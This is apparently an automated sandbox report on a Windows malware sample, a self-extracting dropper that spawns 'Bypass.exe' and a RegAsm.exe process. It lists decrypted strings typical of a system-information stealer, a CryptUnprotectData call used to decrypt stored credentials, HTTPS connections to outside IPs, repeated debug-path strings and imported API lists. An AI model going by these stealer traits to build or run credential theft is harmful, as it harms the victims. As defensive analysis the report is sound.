Source: 13.2.RegAsm.exe.400000.0.unpack	String decryptor: - Screen Resoluton:
Source: 13.2.RegAsm.exe.400000.0.unpack	String decryptor: - Physical Installed Memory:
Source: 13.2.RegAsm.exe.400000.0.unpack	String decryptor: Workgroup: -
Source: 13.2.RegAsm.exe.400000.0.unpack	String decryptor: LPnhqo--@Qudette

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 13_2_00416933 CryptUnprotectData,

13_2_00416933

Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.90.18:443 -> 192.168.2.4:49749 version: TLS 1.2

Source: bFZYRLnRIz.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: ~C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: }C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005474000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: eC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: krnlmp.pdb\\ source: Bypass.exe, 0000000F.00000002.4223150411.000000001BBCF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.000000000490D000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: gC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: kC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: lC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: xC:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005474000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: nC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wC:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: hC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005474000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: yC:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \|C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005474000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: bFZYRLnRIz.exe, 572stuOQ0pZG2Xj.exe.0.dr
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: fC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: vC:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF71613B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF71613B190
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF7161240BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF7161240BC
Source: C:\Users\user\Desktop\bFZYRLnRIz.exe	Code function: 0_2_00007FF71614FCA0 FindFirstFileExA,	0_2_00007FF71614FCA0
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D3340BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	11_2_00007FF64D3340BC
Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe	Code function: 11_2_00007FF64D34B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	11_2_00007FF64D34B190
